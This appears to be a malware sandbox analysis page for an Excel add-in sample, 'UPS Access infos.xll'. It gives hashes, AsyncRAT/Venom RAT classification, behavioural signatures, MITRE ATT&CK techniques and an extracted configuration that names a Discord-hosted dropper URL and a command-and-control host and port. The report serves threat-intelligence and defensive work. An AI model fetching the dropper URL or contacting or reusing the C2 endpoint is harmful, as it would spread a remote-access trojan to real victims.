Overview

overview

10

Static

static

UPS Access infos.xll

windows7_x64

7

UPS Access infos.xll

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    UPS Access infos.xll

  • Size

    2.0MB

  • Sample

    220701-p6zblsdfcj

  • MD5

    df7e8add740fcae0d645eb8f66e085f4

  • SHA1

    f5fd645f5596028a550c1e3351f3e097b33ddc17

  • SHA256

    d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

  • SHA512

    65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

Score
10/10
asyncratvenom clientsrat

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://cdn.discordapp.com/attachments/982077202424279072/992061153092063242/Librarieszip

Extracted

Language
xlm4.0
Source

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

expresschiatto.freeddns.org:4449

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Targets

    • Target

      UPS Access infos.xll

    • Size

      2.0MB

    • MD5

      df7e8add740fcae0d645eb8f66e085f4

    • SHA1

      f5fd645f5596028a550c1e3351f3e097b33ddc17

    • SHA256

      d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

    • SHA512

      65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

    Score
    10/10
    asyncratvenom clientsrat

    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers.

      ratasyncrat

    • Async RAT payload

      rat

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks